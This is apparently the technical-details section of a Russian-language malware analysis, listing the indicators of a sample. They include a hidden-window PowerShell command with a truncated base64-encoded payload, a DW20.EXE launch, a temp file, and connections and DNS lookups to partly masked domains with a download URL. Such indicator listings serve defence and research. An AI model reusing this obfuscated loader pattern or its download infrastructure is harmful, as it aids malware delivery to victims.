Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABUAHoAcABwAGYAbABlAGkAYwBjAGMAZgA9ACcAWgB3AGgAegB6AHYAbQBrAGEAJwA7ACQAUgBiAGEAbABmAG0AeAByAHAAegAgAD0AIAAnADcAMQA1ACcAOwAkAEsAdwBkAHkAZQBrAHEAeQA9ACcARwBvAGMAYwB3A...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1992
- %TEMP%\1168697.cvr
- 'mo###xtend.com':80
- 'dr###atch.com':443
- 'ci#####urologica.com':443
- http://www.mo###xtend.com/New_website/mZUOdoa/
- 'dr###atch.com':443
- 'ci#####urologica.com':443
- DNS ASK mo###xtend.com
- DNS ASK dr###atch.com
- DNS ASK on#####outiquellc.com
- DNS ASK ci#####urologica.com
- DNS ASK is####.edu.uir.ac.id
- DNS ASK hs##.co.uk